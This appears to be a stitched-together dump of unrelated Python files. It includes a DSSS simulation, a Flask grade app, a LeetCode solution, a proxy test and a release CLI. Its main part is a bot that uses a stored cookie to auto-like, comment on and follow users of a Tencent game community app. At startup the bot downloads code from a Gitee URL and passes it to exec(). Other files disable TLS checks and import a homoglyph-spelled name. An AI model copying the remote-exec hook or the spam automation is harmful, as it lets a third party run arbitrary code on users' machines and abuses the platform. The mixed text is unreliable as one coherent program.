base_up_sig = np.kron(base_sig,np.append(1,np.zeros(SPS-1)))
base_up_sig = np.kron(base_up_sig,np.ones_like(PN_CODE))*8
# Spread each symbol by the PN code.
spread_sig = np.kron(base_sig,PN_CODE)
# Chip (pulse-shaping) filter: raised cosine, rolloff 0.4.
rcc_inst = rcos.my_rcc(0.4,SPS,8)
upsampel_sig = np.kron(spread_sig,np.append(1,np.zeros(SPS-1)))
shape_filtered = rcc_inst.rcc_filt(upsampel_sig)
# Additive channel (noise currently disabled by the *0 factor).
noise = np.random.randn(shape_filtered.shape[0])/4
signal_wnoise = shape_filtered + noise*0
# Matched filter at the receiver.
shape_filtered2 = rcc_inst.rcc_filt(signal_wnoise)
# Despreading: sliding correlation against the upsampled PN code.
def despread(din, code):
    """Correlate *din* against the impulse-upsampled PN *code*.

    NOTE(review): uses the module-level SPS as the upsampling factor.
    Output[i] is the dot product of the last min(i, clen) input samples
    with the code prefix; output[0] is 0.
    """
    dlen = din.shape[0]
    # upcode = np.kron(code,np.ones(SPS))
    upcode = np.kron(code, np.append(1, np.zeros(SPS - 1)))
    clen = upcode.shape[0]
    if dlen == 0:
        return []
    values = [0]
    for i in range(1, dlen):
        window = din[max(0, i - clen):i]
        values.append(np.dot(window, upcode[:min(i, clen)]))
    return np.asarray(values, dtype=float)
despread_d = despread(shape_filtered2,PN_CODE)
# Three-panel figure: spread signal, filtered signals, despread correlation.
fig = plt.figure()
ax = fig.add_subplot(311)
ax.plot(spread_sig)
#ax.plot(upsampel_sig)
ax.set_title("spread_sig")
bx = fig.add_subplot(312)
bx.plot(shape_filtered,label="srcc")
bx.plot(shape_filtered2,label="rcc")
bx.legend()
bx.set_title("filtered")
cx = fig.add_subplot(313)
# Receiver output scaled x10 so the correlation peaks are visible alongside it.
cx.plot(shape_filtered2*10,label='rx')
cx.plot(despread_d,label='dspread')
#cx.plot(base_up_sig,label='upsampel_sig')
cx.legend()
|
import requests
from urllib import request
from colorama import init,Fore
import json
import time
import os
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
# Extract the substring between two markers.
def GetMiddleStr(content, startStr, endStr):
    """Return the text of *content* between the first *startStr* and the
    first *endStr* (both searched from the start of the string).

    Raises ValueError when either marker is absent (str.index semantics).
    """
    begin = content.index(startStr) + len(startStr)
    end = content.index(endStr)
    return content[begin:end]
# Reserved extension module: updated remotely when needed.
def myFun():
    """Download a Python snippet from a Gitee raw URL and exec() it.

    SECURITY: this executes remote code fetched over the network with no
    authentication or integrity check -- whoever controls that repository
    (or the connection) can run arbitrary code here. Do not use on
    untrusted networks; prefer removing this mechanism entirely.
    """
    try:
        url = "https://gitee.com/intC/test/raw/master/myfun"
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'
        }
        req = request.Request(url,headers=headers)
        response = request.urlopen(req).read().decode("utf-8")
        exec(response)
    except Exception as r:
        print('预留模块执行出错 %s' %(Fore.RED+str(r)))
# Visit another user's profile page (bumps their popularity counter).
def doLookMian(friendUserId):
    """Request friendUserId's profile via the JSONP endpoint and print the
    resulting popularity value.

    NOTE(review): relies on module-level COOKIE, UIN and USERID being
    defined elsewhere in this file -- confirm before calling.
    """
    time.sleep(1)  # crude rate limiting between requests
    nowtime = int(time.time() * 1000)
    url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/user/getuserinfo&callback=jQuery17100012562480264131093_{}&uin={}&userId={}&friendUserId={}&_={}"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
        'Cookie':COOKIE
    }
    base_url = url.format(nowtime,UIN,USERID,friendUserId,nowtime)
    req = request.Request(base_url,headers=headers)
    try:
        response = request.urlopen(req)
        # Strip the JSONP wrapper "jQuery...( ... );" to get the JSON payload.
        responseTxt = GetMiddleStr(response.read().decode("utf-8"),'(',');')
        sMsg = json.loads(responseTxt)['sMsg']
        # jData is double-encoded JSON: a JSON string inside the JSON response.
        popularity = json.loads(json.loads(responseTxt)['jData']['jData'])['data']['popularity']
        print("------访问:[{}]成功-人气值[{}]------".format(friendUserId,popularity))
    except Exception as r:
        print('查看主页未知错误 %s' %(Fore.RED+str(r)))
# Like (upvote) a moment/post.
def doDianzan(momentId):
    """Send a like request for *momentId* and print the API's reply.

    Sleeps 120 s when the API reports a rate limit ('频率' in the message).
    NOTE(review): uses module-level COOKIE, UIN, USERID -- defined elsewhere.
    """
    time.sleep(3)  # pacing between likes
    url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/moment/like&callback=jQuery171006764405901210213_1590{}&uin={}&userId={}&momentId={}&type=1&_={}"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
        'Cookie':COOKIE
    }
    base_url = url.format(momentId,UIN,USERID,momentId,momentId)
    req = request.Request(base_url,headers=headers)
    try:
        response = request.urlopen(req)
        # Slice off the fixed-length JSONP wrapper to get the JSON payload.
        responseText = response.read().decode("utf-8")[42:-2]
        sMsg = json.loads(responseText)['sMsg']
        # jData is double-encoded JSON.
        returnMsg = json.loads(json.loads(responseText)['jData']['jData'])['returnMsg']
        print("----------------点赞{}-------------异常:{}".format(sMsg,Fore.RED+returnMsg))
        if '频率' in returnMsg:
            # Rate-limited: back off for 120 seconds.
            time.sleep(120)
    except Exception as r:
        print('点赞未知错误 %s' %(Fore.RED+str(r)))
# Comment on a moment/post.
def doPinglun(momentId):
    """Post a comment (the current date, "MM.DD") on *momentId*.

    Sleeps 60 s when the API reports a rate limit ('频率' in the message).
    NOTE(review): uses module-level COOKIE, UIN, USERID -- defined elsewhere.
    """
    time.sleep(3)  # pacing between comments
    # Comment text is today's date, e.g. "05.29".
    text = time.strftime("%m", time.localtime()) + "." + time.strftime("%d", time.localtime())
    url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/moment/addcomment&callback=jQuery17108402774150402388_1590{}&uin={}&userId={}&roleId=1318055637&text={}&momentId={}&replyCommentId=0"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
        'Cookie':COOKIE
    }
    base_url = url.format(momentId,UIN,USERID,text,momentId)
    req = request.Request(base_url,headers=headers)
    try:
        response = request.urlopen(req)
        # Slice off the fixed-length JSONP wrapper to get the JSON payload.
        responseText = response.read().decode("utf-8")[41:-2]
        sMsg = json.loads(responseText)['sMsg']
        returnMsg = json.loads(json.loads(responseText)['jData']['jData'])['returnMsg']
        print("----------------评论{}-------------异常:{}".format(sMsg,Fore.RED+returnMsg))
        time.sleep(2)
        if '频率' in returnMsg:
            # Rate-limited: back off for 60 seconds.
            time.sleep(60)
    except Exception as r:
        print('评论未知错误 %s' %(Fore.RED+str(r)))
# Square tag ids observed in the API payload:
#   tagId 1 = hot ("热门"), tagId 2 = latest ("最新"), tagId 3 = video ("视频").
def getNewMoments(tagid = 2):
    """Fetch the moment list for *tagid* (default 2 = latest).

    Returns a list of dicts with keys momentId, userId, text, name;
    returns an empty list on any error.
    NOTE(review): uses module-level COOKIE and USERID -- defined elsewhere.
    """
    time.sleep(1)  # crude rate limiting
    nowtime = int(time.time() * 1000)
    url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/moment/squaretagmoments&callback=jQuery17100504510865243335_{}&gameId=10002&userId={}&tagId={}"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
        'Cookie':COOKIE
    }
    base_url = url.format(nowtime,USERID,tagid)
    req = request.Request(base_url,headers=headers)
    objHotText = []
    try:
        response = request.urlopen(req)
        # Slice off the fixed-length JSONP wrapper to get the JSON payload.
        responseText = response.read().decode("utf-8")[41:-2]
        # jData is double-encoded JSON.
        msg = json.loads(responseText)['jData']['jData']
        data_list = json.loads(msg)['data']
        for l in data_list['list']:
            hotText={}
            hotText['momentId'] = l['momentId']
            hotText['userId'] = l['userId']
            hotText['text'] = l['text']
            hotText['name'] = l['name']
            objHotText.append(hotText)
        return(objHotText)
    except Exception as r:
        print('获取最新动态未知错误 %s' %(Fore.RED+str(r)))
        return(objHotText)
# Fetch the moments under a hot topic (momentId, userId, text, name).
def getHotText(huatiId):
    """Fetch moments posted under topic *huatiId*.

    Returns a list of dicts with keys momentId, userId, text, name;
    returns an empty list on any error.
    NOTE(review): uses module-level COOKIE and USERID -- defined elsewhere.
    """
    time.sleep(1)  # crude rate limiting
    nowtime = int(time.time() * 1000)
    url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/moment/topicmomentlist&callback=jQuery17109485360742260489_{}&gameId=10002&userId={}&fromIds=&topicId={}&sortType=1&_={}"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
        'Cookie':COOKIE
    }
    base_url = url.format(nowtime,USERID,huatiId,nowtime)
    req = request.Request(base_url,headers=headers)
    objHotText = []
    try:
        response = request.urlopen(req)
        # Slice off the fixed-length JSONP wrapper to get the JSON payload.
        responseText = response.read().decode("utf-8")[41:-2]
        # jData is double-encoded JSON.
        msg = json.loads(responseText)['jData']['jData']
        data_list = json.loads(msg)['data']
        for l in data_list['list']:
            hotText={}
            hotText['momentId'] = l['momentId']
            hotText['userId'] = l['userId']
            hotText['text'] = l['text']
            hotText['name'] = l['name']
            objHotText.append(hotText)
        return(objHotText)
    except Exception as r:
        print('获取热门话题内容未知错误 %s' %(Fore.RED+str(r)))
        return(objHotText)
# Fetch the ids of currently-hot topics.
def getHuatiId():
    """Return a list of hot-topic id strings, filtered by post volume.

    Returns an empty list on any error.
    NOTE(review): uses module-level COOKIE and USERID -- defined elsewhere.
    """
    time.sleep(1)  # crude rate limiting
    url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/gethottopiclist&callback=jQuery17100504510865243335_1590662496827&gameId=10002&userId={}&tagId=0&fromIds=0&_=1590662497426"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
        'Cookie':COOKIE
    }
    base_url = url.format(USERID)
    req = request.Request(base_url,headers=headers)
    huatiId_list = []
    try:
        response = request.urlopen(req)
        # Strip the JSONP wrapper "jQuery...( ... )" to get the JSON payload.
        responseTxt = GetMiddleStr(response.read().decode("utf-8"),'(',')')
        data_list = json.loads(json.loads(responseTxt)['jData']['jData'])['data']['list']
        # Keep only topics whose desc reports more than 500 posts.
        # (The original comment said 1000, but the code checks > 500.)
        for i in data_list:
            if int(i['desc'][:-2]) > 500:
                huatiId_list.append(str(i['id']))
        return huatiId_list
    except Exception as r:
        print('获取热门话题id未知错误 %s' %(Fore.RED+str(r)))
        return(huatiId_list)
# Fetch the list of users following me and follow back the new ones.
def getBefriends():
    """Follow back the 10 most recent followers that are not yet recorded in "idlist"."""
    time.sleep(1)
    nowtime = int(time.time() * 1000)
    url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/user/friends&callback=jQuery171035700906303473556_{}&uin={}&userId={}&_={}"
    headers = {
        'User-Agent': 'com.tencent.gamehelper.wuxia/2103030265 (Linux; U; Android 6.0.1; zh_CN; MI 4LTE; Build/MMB29M; Cronet/72.0.3626.96)',
        'Accept-Encoding':'gzip, deflate, br',
        'Cookie':COOKIE
    }
    base_url = url.format(nowtime,UIN,USERID,nowtime)
    req = request.Request(base_url,headers=headers)
    try:
        response = request.urlopen(req)
        responseText = GetMiddleStr(response.read().decode("utf-8"),'(',');')
        msg = json.loads(responseText)['jData']['jData']
        data_list = json.loads(msg)['data']['list']
        # Only look at the 10 newest followers.
        # NOTE(review): raises IndexError (silently swallowed below) when the
        # account has fewer than 10 followers — consider min(10, len(data_list)).
        for i in range(10):
            # Followers are recorded as "<userId> add" lines in "idlist".
            if (str(data_list[i]['userId'])+" add\n") not in getTxtid():
                inputTxtid(str(data_list[i]['userId'])+" add")
                doAddfriend(data_list[i]['userId'])
    except Exception as r:
        print('获取关注我的好友列表未知错误 %s' %(Fore.RED+str(r)))
# Follow (add) one friend by their user id.
def doAddfriend(friendUserId):
    """Send a follow request for *friendUserId* and log the server's reply."""
    time.sleep(1)
    nowtime = int(time.time() * 1000)
    url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/user/addfriend&callback=jQuery17108775488098925086_{}&uin={}&userId={}&friendUserId={}&_={}"
    headers = {
        'User-Agent': 'com.tencent.gamehelper.wuxia/2103030265 (Linux; U; Android 6.0.1; zh_CN; MI 4LTE; Build/MMB29M; Cronet/72.0.3626.96)',
        'Accept-Encoding':'gzip, deflate, br',
        'Cookie':COOKIE
    }
    base_url = url.format(nowtime,UIN,USERID,friendUserId,nowtime)
    req = request.Request(base_url,headers=headers)
    try:
        response = request.urlopen(req)
        # Strip the fixed-length JSONP wrapper (see getHotText).
        responseText = response.read().decode("utf-8")[41:-2]
        returnMsg = json.loads(json.loads(responseText)['jData']['jData'])['returnMsg']
        print(returnMsg)
        # NOTE(review): this line labels EVERY reply as "异常" (exception), even
        # successes — the message text and placement look unintentional.
        print("-------------关注[{}]-----------异常:{}".format(friendUserId,Fore.RED+returnMsg))
    except Exception as r:
        print('关注好友未知错误 %s' %(Fore.RED+str(r)))
# Resolve the in-game userId from a QQ uin.
def getUserId(uin):
    """Return the userId for *uin*, or None (implicitly) if the request fails."""
    nowtime = int(time.time() * 1000)
    url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/getuserid&callback=jQuery17101425417301713745_{}&uin={}"
    headers = {
        'User-Agent': 'com.tencent.gamehelper.wuxia/2103030265 (Linux; U; Android 6.0.1; zh_CN; MI 4LTE; Build/MMB29M; Cronet/72.0.3626.96)',
        'Accept-Encoding':'gzip, deflate, br',
        'Cookie':COOKIE
    }
    base_url = url.format(nowtime,uin)
    req = request.Request(base_url,headers=headers)
    try:
        response = request.urlopen(req)
        responseText = GetMiddleStr(response.read().decode("utf-8"),'(',')')
        userid = json.loads(json.loads(responseText)['jData']['jData'])['data']['userId']
        return userid
    except Exception as r:
        # NOTE(review): falls through returning None — the module-level caller
        # (USERID = getUserId(UIN)) does not check for that.
        print('获取userid未知错误 %s' %(Fore.RED+str(r)))
# Fetch the list of users who recently visited my page and visit them back.
def getBevisits():
    """Visit back every not-yet-recorded visitor from the be-visited list."""
    time.sleep(1)
    nowtime = int(time.time() * 1000)
    url = "https://apps.game.qq.com/wuxia_cgi/ZoneTranspondCgi/index.php?act=requestTranspond&sMethodPath=/api/user/getbevisits&callback=jQuery171003770645901213299_1592888857747&uin={}&friendUserId={}&lastIndex=0&_={}"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
        'Cookie':COOKIE
    }
    # BUG FIX: the first placeholder is the "uin" query parameter. The old call
    # url.format(nowtime, USERID, nowtime) sent a millisecond timestamp as the
    # uin; every sibling endpoint in this module passes UIN there.
    base_url = url.format(UIN,USERID,nowtime)
    req = request.Request(base_url,headers=headers)
    try:
        response = request.urlopen(req)
        responseText = GetMiddleStr(response.read().decode("utf-8"),'(',');')
        userid_list = json.loads(json.loads(responseText)['jData']['jData'])['data']['list']
        for u in userid_list:
            # Visitors are recorded as "<userId> go" lines in "idlist";
            # only react to ids we have not seen before.
            if (u['userId']+" go\n") not in getTxtid():
                inputTxtid(u['userId']+" go")
                # Visit the user's page in return.
                doLookMian(u['userId'])
    except Exception as r:
        print('获取来访列表未知错误 %s' %(Fore.RED+str(r)))
# Record one id (post/follower/visitor marker) in the local "idlist" file.
def inputTxtid(momentId):
    """Append *momentId* as one line to "idlist" (created on first write)."""
    # The with-statement closes the file; the explicit close() that used to
    # follow inside the block was redundant.
    with open("idlist", 'a',encoding='utf-8') as file_object:
        file_object.write(str(momentId)+"\n")
# Read back all recorded ids (used to decide whether content is new).
def getTxtid():
    """Return every line of "idlist" (with trailing newlines); [] if empty/new."""
    # Create the file on first use so the read below never fails.
    if not os.path.isfile("idlist"):
        with open("idlist", mode="w", encoding="utf-8"):
            pass
    # BUG FIX: read with the same encoding the writer (inputTxtid) uses;
    # the old code read with the locale default, which mangles non-ASCII ids
    # on platforms whose default encoding is not UTF-8.
    with open('idlist', 'r', encoding='utf-8') as f:
        return f.readlines()
# --- module entry: load the session cookie, resolve ids, then poll forever ---
# The cookie is expected on the first line of "1.txt".
f = open('1.txt',mode='r')
COOKIE=f.readlines()[0]
f.close()
# The QQ uin is embedded in the cookie as "uin=o<digits>;".
UIN = GetMiddleStr(COOKIE,'uin=o',';')
print("UIN:%s"%UIN)
USERID = getUserId(UIN)
print("USERID:%s"%USERID)
myFun()
# colorama: reset terminal colors automatically after each print.
init(autoreset=True)
while True:
    commentText = getNewMoments()
    # Walk every fetched post.
    for context in commentText:
        # Only react to posts we have not recorded yet.
        if (context['momentId']+"\n") not in getTxtid():
            inputTxtid(context['momentId'])
            print("\nmomentId:{}\nuserId:{}\ntext:{}\nname:{}\n".format(context['momentId'],context['userId'],context['text'],context['name']))
            # Like and comment on the new post.
            doDianzan(context['momentId'])
            doPinglun(context['momentId'])
            print("===========[%s]==========="%(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())))
            time.sleep(0.2)
    # Follow back new followers.
    getBefriends()
    # Visit back recent visitors.
    getBevisits()
    # Poll every 60 seconds.
    time.sleep(60)
|
import json
import argparse
import collections
import datetime
import pathlib
import typing
import yaml
from . import serialize, discover, DateContext
ArtifactLocation = collections.namedtuple(
"ArtifactLocation",
[
"artifact_key",
"artifact",
"publication_key",
"publication",
"collection_key",
"collection",
],
)
def _all_artifacts(universe):
for collection_key, collection in universe.collections.items():
for publication_key, publication in collection.publications.items():
for artifact_key, artifact in publication.artifacts.items():
yield ArtifactLocation(
artifact_key,
artifact,
publication_key,
publication,
collection_key,
collection,
)
class _Never:
def __lt__(self, other):
if not isinstance(other, (datetime.date, _Never)):
return NotImplemented
return False
def __gt__(self, other):
if not isinstance(other, (datetime.date, _Never)):
return NotImplemented
return True
class ReleaseInfo(typing.NamedTuple):
# the sooner of the publication release time and the artifact release time;
# if both are None, so is this
effective_release_time: datetime.datetime
# the smaller of the publication ready and artifact ready
ready: bool
def _release_info(loc):
if loc.artifact.release_time is None:
ert = loc.publication.release_time
elif loc.publication.release_time is None:
ert = loc.artifact.release_time
else:
ert = min(loc.publication.release_time, loc.artifact.release_time)
ready = min(loc.artifact.ready, loc.publication.ready)
return ReleaseInfo(ert, ready)
def _header(message):
return "\u001b[1m" + message + "\u001b[0m"
def _normal(message):
return message
def _body(message):
return "\u001b[2m" + message + "\u001b[0m"
def _warning(message):
return "\u001b[33m" + message + "\u001b[0m"
def _success(message):
return "\u001b[32m" + message + "\u001b[0m"
def _error(message):
return "\u001b[31m" + message + "\u001b[0m"
def _purple(message):
return "\u001b[35m" + message + "\u001b[0m"
def cli(argv=None):
    # NOTE(review): dead stub — unconditionally shadowed by the real
    # `def cli()` defined at the bottom of this module; *argv* is never used.
    # Safe to delete once confirmed nothing imports this symbol positionally.
    pass
def _rpad(s, total_len):
difference = total_len - len(s)
return s + (" " * difference)
def _lpad(s, total_len):
difference = total_len - len(s)
return (" " * difference) + s
def _days_between(date_x, date_y):
return (date_x - date_y).days
def release_schedule(args):
    """Print a day-by-day calendar of artifact releases, color-coded by status.

    Statuses: red = not ready, purple = ready but file missing, yellow =
    waiting for its release time, green = released.
    """
    universe = discover(
        args.path, skip_directories=args.skip_directories, template_vars=args.vars
    )
    # get the release info for every artifact
    info = [(loc, _release_info(loc)) for loc in _all_artifacts(universe)]
    # NOTE(review): without_release_time is computed but never used.
    without_release_time = [x for x in info if x[1].effective_release_time is None]
    with_release_time = [x for x in info if x[1].effective_release_time is not None]
    if not args.show_not_ready:
        with_release_time = [x for x in with_release_time if x[1].ready]
    # sort in order of release time
    sorted_releases = sorted(
        with_release_time, key=lambda x: x[1].effective_release_time
    )
    # Bucket releases by calendar day for the rendering loop below.
    by_date = collections.defaultdict(lambda: [])
    for time in sorted_releases:
        date = time[1].effective_release_time.date()
        by_date[date].append(time)
    first_date = datetime.date.today()
    # NOTE(review): IndexError when sorted_releases is empty (no timed,
    # shown releases) — consider an early return in that case.
    last_date = sorted_releases[-1][1].effective_release_time.date()
    date_cursor = first_date
    while date_cursor <= last_date:
        releases = by_date[date_cursor]
        # Visual separator at the start of each week (Monday).
        if date_cursor.weekday() == 0 and not args.skip_empty_days:
            print()
            print(9 * " ", _body("----------"))
            print()
        if date_cursor == datetime.date.today():
            header = "today"
        else:
            header = ""
        if releases or not args.skip_empty_days:
            print(_header(_lpad(header, 9)), end=" ")
            print(date_cursor.strftime("%a %b %d").lower())
        if date_cursor not in by_date:
            date_cursor += datetime.timedelta(days=1)
            continue
        for loc, (ert, ready) in by_date[date_cursor]:
            suffix = ''
            # An artifact counts as missing if its output file does not exist yet.
            missing = not (loc.artifact.workdir / loc.artifact.file).exists()
            if not ready:
                color = _error
                suffix = '(not ready)'
            elif missing:
                suffix = '(missing)'
                color = _purple
            elif ert > datetime.datetime.now():
                color = _warning
                suffix = '(waiting)'
            else:
                color = _success
                suffix = '(released)'
            if ert.date() == date_cursor:
                print(21 * " ", end="")
            print(
                str(ert.time()),
                _body("::"),
                color(loc.collection_key),
                _body("/"),
                color(loc.publication_key),
                _body("/"),
                color(loc.artifact_key),
                end="",
            )
            print(f" {suffix}")
        date_cursor += datetime.timedelta(days=1)
def _arg_vars_file(s):
try:
name, path = s.split(":")
except ValueError:
raise argparse.ArgumentTypeError(
'Vars file argument must be of form "name:path"'
)
with open(path) as fileobj:
values = yaml.load(fileobj, Loader=yaml.Loader)
return {name: values}
def _configure_release_schedule_cli(subparsers):
    """Register the "release-schedule" subcommand and its options."""
    parser = subparsers.add_parser("release-schedule")
    parser.set_defaults(cmd=release_schedule)
    # Positional path defaults to the current working directory.
    parser.add_argument(
        "path", default=pathlib.Path.cwd(), nargs="?", type=pathlib.Path
    )
    parser.add_argument(
        "--skip-directories",
        type=str,
        nargs="+",
        help="directories that will be ignored during discovery",
    )
    parser.add_argument("--show-not-ready", action="store_true", default=False)
    parser.add_argument("--skip-empty-days", action="store_true", default=False)
    parser.add_argument(
        "--vars",
        type=_arg_vars_file,
        default=None,
        help="A yaml file whose contents will be available in discovery as template variables.",
    )
def cli():
    """Entry point: build the parser, then dispatch to the selected command."""
    parser = argparse.ArgumentParser()
    subcommands = parser.add_subparsers()
    _configure_release_schedule_cli(subcommands)
    parsed = parser.parse_args()
    # Each subcommand registers its handler via set_defaults(cmd=...).
    parsed.cmd(parsed)
|
from core.permissions import BasePеrmission
# Permissions that will be used in the project.
# NOTE(review): the imported name "BasePеrmission" appears to contain a
# Cyrillic 'е' (U+0435) homoglyph instead of a Latin 'e' — verify against the
# actual symbol exported by core/permissions.py before relying on it.
import os
from flask import Flask, render_template, json , request
from flaskext.mysql import MySQL
from werkzeug import generate_password_hash, check_password_hash
app = Flask(__name__)
mysql =MySQL()
# MySQL connection settings for the "catalog" database.
# NOTE(review): empty password and credentials committed in source — move to
# environment/config in production.
app.config['MYSQL_DATABASE_USER'] = 'ioanirimia'
app.config['MYSQL_DATABASE_PASSWORD'] = ''
app.config['MYSQL_DATABASE_DB'] = 'catalog'
app.config['MYSQL_DATABASE_HOST'] = 'localhost'
mysql.init_app(app)
# One module-level connection/cursor shared by every request handler.
# NOTE(review): not safe under concurrent requests; fine for a single-user demo.
conn = mysql.connect()
cursor = conn.cursor()
# (removed a second, redundant mysql.init_app(app) call that followed here)
@app.route("/")
def main():
    # Simple landing / health-check endpoint.
    return "hello"
@app.route("/login")
def login():
    # Render the login page.
    return render_template('login.html')
@app.route("/index")
def index():
    # Render the home page.
    return render_template('index.html')
@app.route("/showSignUp")
def showSignUp():
    # Render the account-registration page.
    return render_template('signup.html')
@app.route("/pagCatalog")
def pagCatalog():
    # Render the grade-catalog page.
    return render_template('pag_catalog.html')
@app.route("/intr_Note")
def intr_Note():
    # Render the grade-entry page.
    return render_template('introducere_note.html')
@app.route('/signIn',methods=['POST'])
def signIn():
    # Authenticate a user; responds with a small JSON status payload.
    # (This file is Python 2 — note the print statement below.)
    # read the posted values from the UI
    _name = request.form['username']
    _password = request.form['password']
    # validate the received values
    if _name and _password:
        # NOTE(review): generate_password_hash produces a randomly-salted hash,
        # so hashing the submitted password here can only ever match the stored
        # value if sp_check_login hashes identically/deterministically — verify;
        # the usual pattern is to fetch the stored hash and use
        # check_password_hash(stored, _password).
        _hashed_password = generate_password_hash(_password)
        cursor.callproc('sp_check_login',(_name,_hashed_password))
        data = cursor.fetchall()
        print str(data[0][0])
        if str(data[0][0]).encode('utf-8') == u'Login fail'.encode('utf-8'):
            return json.dumps({'html':'<span>Login fail</span>',
                               'message':str(data[0][0])})
        else:
            return json.dumps({'html':'<span>Login success</span>',
                               'message':str(data[0][0])})
    # NOTE(review): falls through returning None (HTTP 500) when either field
    # is empty — consider returning an explicit error payload.
@app.route('/signUp',methods=['POST'])
def signUp():
# read the posted values from the UI
_email = request.form['inputEmail']
_name = request.form['inputName']
_prenume = request.form['inputPrenume']
_password = request.form['inputPassword']
_datanasterii = request.form['inputDataN']
_clasa = request.form['inputClasa']
# validate the received values
if _name and _email and _password:
_hashed_password = generate_password_hash(_password)
print len(_hashed_password), _hashed_password
cursor.callproc('sp_createUser',(_name,_email,_hashed_password, _prenume, _datanasterii, _clasa))
data = cursor.fetchall()
if len(data) is 0: # daca s-a inserat utilizator
conn.commit()
return json.dumps({'html':'<span>Toate campurile sunt completate</span>',
'message':'User created successfully !'})
else:
return json.dumps({'error':str(data[0])})
else:
return json.dumps({'html':'<span>Completati campurile lipsa</span>'})
@app.route('/loadTable',methods=['GET'])
def loadTable():
    # Build the grade-table HTML rows for one user and return them as JSON.
    # (This file is Python 2 — note the print statement below.)
    user_username = request.args.get('user_username')
    cursor.callproc('sp_getNote',(user_username,))
    data = cursor.fetchall()
    print data
    dictionar = {'html':''}
    # NOTE(review): DB values are concatenated into HTML without escaping (XSS
    # risk if any field is user-controlled), and the average column is the
    # hard-coded placeholder "7.3".
    for i in range(len(data)):
        dictionar['html'] += '<tr> ' + \
                             '<th> '+ data[i][0] +' </th>' + \
                             '<th>'+ data[i][1] +' </th>' + \
                             '<th> '+ data[i][2] +' </th>' + \
                             '<th> '+ str(data[i][3]) +' </th>' + \
                             '<th> '+ str(data[i][4]) +' </th>' + \
                             '<th> 7.3 </th>' + \
                             ' </tr>'
    return json.dumps(dictionar)
if __name__ == "__main__":
    # BUG FIX: the host/port app.run(...) used to execute unconditionally at
    # import time (blocking, and making the guarded app.run() below it
    # unreachable in practice). Start the dev server only when this module is
    # executed directly.
    app.run(host=os.getenv('IP', '0.0.0.0'), port=int(os.getenv('PORT', 8080)))
# -*- coding: utf-8 -*-
class Solution:
    def containsDuplicate(self, nums):
        """Return True iff *nums* contains any value at least twice."""
        # A set drops duplicates, so a shorter set means a repeat existed.
        return len(set(nums)) != len(nums)
if __name__ == "__main__":
    # Quick self-check of containsDuplicate against known cases.
    checker = Solution()
    for nums, expected in (
        ([1, 2, 3, 1], True),
        ([1, 2, 3, 4], False),
        ([1, 1, 1, 3, 3, 4, 3, 2, 4, 2], True),
    ):
        assert checker.containsDuplicate(nums) == expected
|
import requests
from proxypool.setting import TEST_URL
PROXY_POOL_URL = 'http://localhost:5555/random'
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"}
def get_proxy():
    """Fetch one proxy address from the local pool service.

    Returns the proxy string ("host:port") on HTTP 200, otherwise None.
    """
    try:
        response = requests.get(PROXY_POOL_URL)
    # BUG FIX: the old clause caught the BUILTIN ConnectionError, which
    # requests.exceptions.ConnectionError does not inherit from, so pool-down
    # failures propagated instead of returning None. Catch requests' own
    # exception hierarchy.
    except requests.exceptions.RequestException:
        return None
    if response.status_code == 200:
        return response.text
    # Explicitly mirror the old implicit None for non-200 responses.
    return None
proxy = get_proxy()
print(proxy)
# NOTE(review): if get_proxy() returned None (pool down / non-200), the string
# concatenations below raise TypeError — guard before building the dict.
proxies = {
    'http': 'http://' + proxy,
    'https': 'https://' + proxy,
}
print(TEST_URL)
# verify=False disables TLS certificate checking — acceptable only for testing.
response = requests.get(TEST_URL, headers=headers, proxies=proxies, verify=False)
if response.status_code == 200:
    print('Successfully')
    print(response.text)
import unittest, os
import numpy as np
from molecules import Cluster, Property, Water, Rotator
from use_generator import Generator
from template import Template
FILE = os.path.join( os.path.dirname(__file__), 'tip3p44_10qm.mol' )
class WaterTest( unittest.TestCase ):
    """Tests for water-cluster property transfer and polytensor rotations."""
    def setUp(self):
        # Shared 10-water cluster fixture read from the bundled .mol file,
